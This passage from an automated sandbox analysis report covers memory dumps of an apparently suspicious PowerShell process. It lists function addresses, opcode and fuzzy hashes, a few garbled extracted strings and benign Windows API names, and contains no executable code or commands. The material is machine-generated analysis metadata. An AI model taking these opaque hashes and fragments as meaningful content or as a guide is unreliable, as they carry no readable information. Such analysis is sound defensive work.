Instruction Fuzzy Hash: 6EE14B34A10205CFDB05DF65D898AAEBBF2BF88351F148068E905DB365DB75DD41CBA0

Function 0819E218 Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455354910.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8190000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b846b83d0892a0670aa7550ea9359ea33de2f525203ceade35db9be568b7dd8
Instruction ID: 05620b0a6adba1a6afa0f8ef98309636ed47484e9c78556101f3c451ff9a3fc5
Opcode Fuzzy Hash: 0b846b83d0892a0670aa7550ea9359ea33de2f525203ceade35db9be568b7dd8
Instruction Fuzzy Hash: 50E17030A00319DBEB15DB64C850BAAB772FF89301F1085A9E50A7B391DF75AD81CBA1

Function 08367DD8 Relevance: 10.4, Strings: 8, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ld<q, xrefs: 08367EFE
Ld<q, xrefs: 08367F89
Ld<q, xrefs: 08367F0A
Ld<q, xrefs: 08368036
Ld<q, xrefs: 08367F7D
"Cq, xrefs: 0836829A
"Cq, xrefs: 08367FD8
Ld<q, xrefs: 08368042

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: "Cq$"Cq$Ld<q$Ld<q$Ld<q$Ld<q$Ld<q$Ld<q
API String ID: 0-56026265
Opcode ID: 9dd6559559195f45b0949cd0615ee09fead9f61389429c5509782fb069891141
Instruction ID: f1a6d5702a59488d99ad051dc0a1e40b9e8eabc67be896e6cde0326c2ee0d2c6
Opcode Fuzzy Hash: 9dd6559559195f45b0949cd0615ee09fead9f61389429c5509782fb069891141
Instruction Fuzzy Hash: A9023B74B002099FDB14DBA8C994AAEB7F6BFC8355F148529E416AB354DF34EC02CB91

Function 08369E20 Relevance: 6.5, Strings: 5, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Cq, xrefs: 0836A1AF
"Cq, xrefs: 0836A020
^Cq, xrefs: 08369FEC
"Cq, xrefs: 0836A12B
^Cq, xrefs: 0836A0F7

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: "Cq$"Cq$^Cq$^Cq$^Cq
API String ID: 0-1209585049
Opcode ID: ba2518d9e8a72f3580b8850ed354c37009d173cd8158616baefe1fb1685e0644
Instruction ID: 6a68d26ba45b3291101642597fbe15c0024b485a0e424863fcaadb82572a0c1e
Opcode Fuzzy Hash: ba2518d9e8a72f3580b8850ed354c37009d173cd8158616baefe1fb1685e0644
Instruction Fuzzy Hash: 87B13434B002059FDB08DF65D894BAEB7B2BFC8340F148529E916AB395DF75AC05CB91

Function 08369E10 Relevance: 4.0, Strings: 3, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Cq, xrefs: 0836A1AF
"Cq, xrefs: 0836A020
^Cq, xrefs: 08369FEC

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: "Cq$^Cq$^Cq
API String ID: 0-2446160166
Opcode ID: 7f7b10af069033931f07f195a7db3195e83dcdacd6c3a3b543af1a7c8bdc88a9
Instruction ID: d1577ccd7628fc5b08064ec5ee2a5cdc4c994b1e90506498e2f3508ea1f44a59
Opcode Fuzzy Hash: 7f7b10af069033931f07f195a7db3195e83dcdacd6c3a3b543af1a7c8bdc88a9
Instruction Fuzzy Hash: 37916134B002059FDB05DF65C894BAEB7B2BFC8300F148569E816AB395DF75AC16CB91

Function 08368ED0 Relevance: 2.6, Strings: 2, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ld<q, xrefs: 08368EF7
Ld<q, xrefs: 08368EEB

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: Ld<q$Ld<q
API String ID: 0-3676270166
Opcode ID: 660ff59d83845b9d175f1ff9f621f98e61d305b4fe6d1f47589d106926ad4176
Instruction ID: 2984115a86afa2f2de59fc83b5222a45c50b075a48dc4ab17c8e37dcfaf744d7
Opcode Fuzzy Hash: 660ff59d83845b9d175f1ff9f621f98e61d305b4fe6d1f47589d106926ad4176
Instruction Fuzzy Hash: F931B175704610DBDB089B39D554A2A77E7EFC8262719C439DA06CB348DF36EC1287B0

Function 082AF558 Relevance: 1.9, Strings: 1, Instructions: 609
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3"j^, xrefs: 082AF602

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID: 3"j^
API String ID: 0-493909277
Opcode ID: ff9cb50b87732dbc5378d3c42652f9327223876a7857309f3ef31581261da541
Instruction ID: 6158428827552e239848b726f907071c8d5c63709faa7d71b62f0fcd08df6e8f
Opcode Fuzzy Hash: ff9cb50b87732dbc5378d3c42652f9327223876a7857309f3ef31581261da541
Instruction Fuzzy Hash: 83421634A10219CFDB18DF64D998BADBBB2FF49305F108569E9069B3A1DB75AC41CF80

Function 08100D20 Relevance: 1.8, Strings: 1, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 08100F75

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 0689c815372cee2ef80638c193532f45341846b146c3926f1f58cfa93bb395b4
Instruction ID: a8a59996f175a6bdf1c29c62a581d0db59b636eefb0f5fee72ff170912c7d6e1
Opcode Fuzzy Hash: 0689c815372cee2ef80638c193532f45341846b146c3926f1f58cfa93bb395b4
Instruction Fuzzy Hash: 1C129D34600605CFD714DF69C880A6ABBF2FF89315B258669D45ADB791CB70EC46CF90

Function 041FD4E8 Relevance: 1.7, APIs: 1, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1422853056.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_41f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0030c06dafe5baf6d211004dd2cdaeb7ff75f1a1885a2dd88a6b5bb586b7618e
Instruction ID: 40fce01a232c828067a5544e80674ba77bc6aa612d1713c35e0753ba8e755cf8
Opcode Fuzzy Hash: 0030c06dafe5baf6d211004dd2cdaeb7ff75f1a1885a2dd88a6b5bb586b7618e
Instruction Fuzzy Hash: 30916E70E003599FEB24DFA5C894BEDBBF5AF44304F1084AAD50AAB250DB756D86CF90

Function 041FD10C Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 041FD7AA

Memory Dump Source

Source File: 0000000D.00000002.1422853056.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_41f0000_powershell.jbxd

Similarity

API ID: AuthzCodeIdentifyLevel
String ID:
API String ID: 1431151113-0
Opcode ID: 972d5e1863f87f0c55d3828a9e6bca1062fd9c354eb4d221a45d24099eb97efb
Instruction ID: 888cf61dfd81df084fd5cf8930c29b7dec97b0905a046e01ccab8d29a7d2feb2
Opcode Fuzzy Hash: 972d5e1863f87f0c55d3828a9e6bca1062fd9c354eb4d221a45d24099eb97efb
Instruction Fuzzy Hash: 1B41D6B0D01269DFEB24CF59C984BEDBBB5AB08304F1085EAD50DA7250D775AE89CF60

Function 082A53D8 Relevance: 1.6, Strings: 1, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|<Cq, xrefs: 082A5682

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID: |<Cq
API String ID: 0-3515515296
Opcode ID: 5cee1071c06e0b1c4b05c392c5375706ed88d2c54f548c3bcb416a2f96a340b7
Instruction ID: 482f4eae3a881c39711ed37809b1e4225ac7dc12d7fb3076480b702557ffa2c5
Opcode Fuzzy Hash: 5cee1071c06e0b1c4b05c392c5375706ed88d2c54f548c3bcb416a2f96a340b7
Instruction Fuzzy Hash: E9D15834A10205DFDB15DFB8D954AAEBBF6AF88311F148069D912EB391DB35DC06CBA0

Function 041F5328 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 041F53A0

Memory Dump Source

Source File: 0000000D.00000002.1422853056.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_41f0000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c07ea075976f6f764a9ec254e3de663c847fcf40dd1166856dc1081f95ed04e3
Instruction ID: c43150462c81bf717691295bf9b3300b10778bbd936782b921fc26f69b4f5997
Opcode Fuzzy Hash: c07ea075976f6f764a9ec254e3de663c847fcf40dd1166856dc1081f95ed04e3
Instruction Fuzzy Hash: 612127B5C006199BCB14CF9AD98479EFBB4FB48310F10815AD918A7350D774A941CFA1

Function 041F4AFC Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 041F53A0

Memory Dump Source

Source File: 0000000D.00000002.1422853056.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_41f0000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5a477082c473b5bf84cf720569878a81fed46e927ce01df0452d346249313b17
Instruction ID: 763b0e68e67fed47dbc08a57d2379015ce9fd6ebabbfc11bde4417ff044a83c6
Opcode Fuzzy Hash: 5a477082c473b5bf84cf720569878a81fed46e927ce01df0452d346249313b17
Instruction Fuzzy Hash: 2A2133B5D006599BCB14CF9AD984B9EFBF4EB48320F10816AE919A7300D3B4A941CFE5

Function 082EF2A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

SetThreadUILanguage.KERNELBASE ref: 082EF30A

Memory Dump Source

Source File: 0000000D.00000002.1458808932.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82e0000_powershell.jbxd

Similarity

API ID: LanguageThread
String ID:
API String ID: 243849632-0
Opcode ID: c526a8cc74f589bbf4e4e7997fd82d6bc67358b22450a1f2a4d6dde6849aca3d
Instruction ID: 1d03f8beeb84b9946414365e81e9664bb034c201666af1214717d0afd8b17f21
Opcode Fuzzy Hash: c526a8cc74f589bbf4e4e7997fd82d6bc67358b22450a1f2a4d6dde6849aca3d
Instruction Fuzzy Hash: 311125B4C006898FDB10CFAAD584BEEFBF4EB48314F24855AD459A7610C778A544CFA4

Function 082EF2A8 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

SetThreadUILanguage.KERNELBASE ref: 082EF30A

Memory Dump Source

Source File: 0000000D.00000002.1458808932.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82e0000_powershell.jbxd

Similarity

API ID: LanguageThread
String ID:
API String ID: 243849632-0
Opcode ID: 4d483c3aeeec6552c15f011009adffd0bb0f7a511c8d70d85edd32c2b5b83201
Instruction ID: f68b8138d770089a7903d9a680f1daa54476116a3e578a5d459c51f94a0e3633
Opcode Fuzzy Hash: 4d483c3aeeec6552c15f011009adffd0bb0f7a511c8d70d85edd32c2b5b83201
Instruction Fuzzy Hash: F71145B48006888FDB10CF9AC584BEEFBF8EB48324F20845AD418A3210C778A944CFA4

Function 082AF547 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

3"j^, xrefs: 082AF602

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID: 3"j^
API String ID: 0-493909277
Opcode ID: 95d1d9d57648356714e42848455dab955eb50c24648c0c0ab741154b7039f857
Instruction ID: 3f1cd235361e96d3cd4f248db7db442a4f97541a053a8aa388e228a62541e176
Opcode Fuzzy Hash: 95d1d9d57648356714e42848455dab955eb50c24648c0c0ab741154b7039f857
Instruction Fuzzy Hash: 8B613834610205CFDB24DF69D998B9DBBB2EF48701F248069E81A9B3A1DB75EC41CF90

Function 0836A3C8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

K9, xrefs: 0836A457

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: K9
API String ID: 0-2830731866
Opcode ID: 7820b64680a75fd79c77110560fce8abc55991afadaf1285036f45cf9de21a38
Instruction ID: 2321d239c4e43ca143ce5c3d1aa29713f2d456b6156188f8f7c63c53c1fe197c
Opcode Fuzzy Hash: 7820b64680a75fd79c77110560fce8abc55991afadaf1285036f45cf9de21a38
Instruction Fuzzy Hash: D2518D30A0020ACFDB15CF68C994AAEBBF2BFC8311F148629D445A7355DB74AD56CBA1

Function 0836A3D8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

K9, xrefs: 0836A457

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: K9
API String ID: 0-2830731866
Opcode ID: 71066dfd8b72a6a3baa643b1bfeb31066c70cc4e65ff5137690381d6a199bbf4
Instruction ID: 4b5385b0c2db10d8bb0ff8d29d0cdd06f58328be5b40eb7f9ffe09b8f11b3c48
Opcode Fuzzy Hash: 71066dfd8b72a6a3baa643b1bfeb31066c70cc4e65ff5137690381d6a199bbf4
Instruction Fuzzy Hash: 47517C70A0020ACFDB15CF69C984AAEB7F6FF88314F148629D805A7355DB70ED56CBA1

Function 0836E7D9 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

34, xrefs: 0836E85E

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: 34
API String ID: 0-837682457
Opcode ID: 0b7fae5115114e4cdffda011ae82c4afc03144c0913fb70481bbaabd34996bf9
Instruction ID: bf905b36680b9f744ee0cbf81d57160999bf0d81c4ac4760642026c6e01c6695
Opcode Fuzzy Hash: 0b7fae5115114e4cdffda011ae82c4afc03144c0913fb70481bbaabd34996bf9
Instruction Fuzzy Hash: 76410235B007059FDB149B79E880ADEBBF1EFC9225B14C56DD819CB241EB34E819CBA1

Function 08368EBF Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Ld<q, xrefs: 08368EEB

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID: Ld<q
API String ID: 0-3953746736
Opcode ID: b728ce93822d6626d926bdd1efc96f7f5ef173803cd9da00ad3cc2ed2f320332
Instruction ID: 8f6d7eb4dbacdc0dee43ffc9ed5814c980e87ecf09515a7f337db7b4a6896680
Opcode Fuzzy Hash: b728ce93822d6626d926bdd1efc96f7f5ef173803cd9da00ad3cc2ed2f320332
Instruction Fuzzy Hash: 7911CE317046009FD7049B39D89492A7BE7EFC9261719807EE906CB359CE36EC42C761

Function 082A6FC8 Relevance: .6, Instructions: 586COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f5dc8506cb546158ef36f3d5b90374b5938add2cc83527c9f33b546f28854c
Instruction ID: 24b50539ccc2513e1cc847d5efb8c6917765922cd82c0c129f46be81faf366a7
Opcode Fuzzy Hash: 17f5dc8506cb546158ef36f3d5b90374b5938add2cc83527c9f33b546f28854c
Instruction Fuzzy Hash: 2F327E34A10209DFDB04DFA5D594AAEBBB6FF88301F14846DE846AB351CB75EC46CB90

Function 0827E9F8 Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45354d8244c3be6e2cec7b46e4b9850e9a486b85727c772c65fb026482f01c5b
Instruction ID: 179e2e5d97086b8aabdeaafa9a9d88a2314e982561542d2882d5e5c69bd1f449
Opcode Fuzzy Hash: 45354d8244c3be6e2cec7b46e4b9850e9a486b85727c772c65fb026482f01c5b
Instruction Fuzzy Hash: 4A221378710214DFDB58DF29C898B69B7B2AF49311F1284E8E84A9B361DB31EC81CF51

Function 082A5CF0 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9cffcefd4285b57be48c50f5e5042d644debe979bee59415ff905e2e15d119f
Instruction ID: b69da8fbe36e2319eec5dc52295ab547b4924722362b38774c356680a140e570
Opcode Fuzzy Hash: b9cffcefd4285b57be48c50f5e5042d644debe979bee59415ff905e2e15d119f
Instruction Fuzzy Hash: 99124C30A10209DFDB18DFA5D594AAEBBF6EF48302F148469E806EB391DB75DD81CB50

Function 083EE0F8 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1460251143.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_83e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59d399c5ecbfbb57c4be653044ebda0a507847f925e4b8b0b63105aec4fdc27
Instruction ID: b233854f70fc4de0c82c083444f622cb11e3770ea0403a9feefe438979587a06
Opcode Fuzzy Hash: c59d399c5ecbfbb57c4be653044ebda0a507847f925e4b8b0b63105aec4fdc27
Instruction Fuzzy Hash: 4E023830A00619CFDB14DF64C484B99B7B2FF84311F55C699E849AB291EB74FD86CB90

Function 082A4219 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639e16e00a86e6ae1287c79038c8a0d521bf6bb85f42ef4c319c3594a5e2240b
Instruction ID: 03f9c2aa0adec7820bc25a4dd7c2599673f2b6c1cac95c63e7e971878a9b1694
Opcode Fuzzy Hash: 639e16e00a86e6ae1287c79038c8a0d521bf6bb85f42ef4c319c3594a5e2240b
Instruction Fuzzy Hash: FF020A34A10219CFDB14EF64D998AADB7B6FF89305F208169D40AAB3A1DB75EC41CF50

Function 0827D7E0 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ac99ffbbce4d2f62a9ee7131b0111846a316ad4694d6d490f8bde5bd46c7f2
Instruction ID: e112f200e8f06b532c84296c6d31f592b2ff83b4cc8654ac830e66fcf7242c45
Opcode Fuzzy Hash: 09ac99ffbbce4d2f62a9ee7131b0111846a316ad4694d6d490f8bde5bd46c7f2
Instruction Fuzzy Hash: 4FF17E30A10209EFDB15DF68D894B9EBBB2FF88315F108429E915AB354CB75ED42CB90

Function 0827EBA1 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13490f1dacdc84b335b75d4af7f51004d027f892a57a893c022e832379c121d3
Instruction ID: 09e7728e48e8185c038fc9257a3aa8b28ee54f738625c811023a2660547db20a
Opcode Fuzzy Hash: 13490f1dacdc84b335b75d4af7f51004d027f892a57a893c022e832379c121d3
Instruction Fuzzy Hash: FC02C178710215DFCB58DF29C498A68B7B2EF4A715F1284E8E84A9B361DB31EC81CF51

Function 0827EC2A Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19736d7270d4e6ecd99ee97ca0519b93b3a56cea121b6ff297e50a57c8fae8cd
Instruction ID: 1a51caf8c4fcbd0146bad65dd75b766d8714a7f1a684f46e0174cf7a737b27e6
Opcode Fuzzy Hash: 19736d7270d4e6ecd99ee97ca0519b93b3a56cea121b6ff297e50a57c8fae8cd
Instruction Fuzzy Hash: 61F1E278710215DFCB58DF29C498A68B7B2EF4A715F1284E8E84A9B361CB31EC81CF51

Function 0827EC8F Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458400994.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ca0f7d3bf606f223967c86c19b7c4a2c2061590a18a85692d3a5169c1a7ddc
Instruction ID: 6de0c66937a9f2ed320cc999f2b78a16863f7b22dcaacbd4663c11df6ce1bad4
Opcode Fuzzy Hash: 53ca0f7d3bf606f223967c86c19b7c4a2c2061590a18a85692d3a5169c1a7ddc
Instruction Fuzzy Hash: C6F1C078710214DFCB58DF29C498A68B7B2EF4A715F1284E8E84A9B361DB31ED81CF51

Function 08102DD0 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1454961540.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9420f569fd93027209056ff125cf3b4ba6fa78a7aef20b4895f4efd1d27f3ae
Instruction ID: 18eca231eeb40f2ba595f97ef19422dfbecf67857d8b947664479cabf89a5075
Opcode Fuzzy Hash: b9420f569fd93027209056ff125cf3b4ba6fa78a7aef20b4895f4efd1d27f3ae
Instruction Fuzzy Hash: 67D14A30700205ABD704EF68C891AAEB7B6BFC5204F60862DD415DB291EFB6BD45CBE1

Function 0819F3B8 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1455354910.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8190000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b758d269887985c111a658cfbd88bec59a47ed312c4452d0819af1479aecc38e
Instruction ID: f8ee33ca728a2a5ffd690ecfcef262ac3fd3e8efc401898c418225c58924fbaf
Opcode Fuzzy Hash: b758d269887985c111a658cfbd88bec59a47ed312c4452d0819af1479aecc38e
Instruction Fuzzy Hash: C4B1AC303007059FE704EB74D890A9EB3B2FFC5284B548968D546CB6A5DFB5ED0ACB92

Function 082ABE40 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee046be69332012285e12e36a6c444bad1841d79cc5f94c56f777662f23488d
Instruction ID: 0441b6bbe42961004907a2f044d95dec728b6978dc3e7814e3ac2f544b7fb701
Opcode Fuzzy Hash: eee046be69332012285e12e36a6c444bad1841d79cc5f94c56f777662f23488d
Instruction Fuzzy Hash: 84D11774A11209CFDB14CF98C684B99BBB2FF48305F5581A9E406AF269C779ED89CF40

Function 083EB7C8 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1460251143.00000000083E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_83e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ca332a9b7d52363690b0cf17c64a2afeb9385173bb04725311fed654a92f00
Instruction ID: bfa09712d134d36bba63ef11383cd5943b084538bb8b22b3c51dc8c46ff25c2f
Opcode Fuzzy Hash: 34ca332a9b7d52363690b0cf17c64a2afeb9385173bb04725311fed654a92f00
Instruction Fuzzy Hash: 11A1BE70A002168FDB01DF68C494AAEFBB1FFC9321B118569E555AB391DB34EC46CBE1

Function 0836DD18 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458988729.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86478202a8e914bc51c3ce8af887d091b8c54a0eefdd0828da79c019d13c9e0
Instruction ID: c9b049554610d700b38af3869f9816fffa114e15d565171dbd0fd4d9d9127e1c
Opcode Fuzzy Hash: c86478202a8e914bc51c3ce8af887d091b8c54a0eefdd0828da79c019d13c9e0
Instruction Fuzzy Hash: E1C14770700706CFDB20DF69D980A9EB7F6FF88311B00862DE4069BA55DB75E916CBA1

Function 082A3238 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458579581.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_82a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4c62aa43839df9add8a420195983986bce5404a0b2c79213004b941fdcaf29
Instruction ID: 50f8456c2c2e8ce74407a53f18abfbb7ced0efef9945c6cf52ddc50598948a70
Opcode Fuzzy Hash: ef4c62aa43839df9add8a420195983986bce5404a0b2c79213004b941fdcaf29
Instruction Fuzzy Hash: 00A18C30A10605DFDB15DF69D8986AEBBB2EF88301F10852DD816EB350DB75EC46CB90

Function 08282F30 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1458456552.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false

Joe Sandbox IDA Plugin

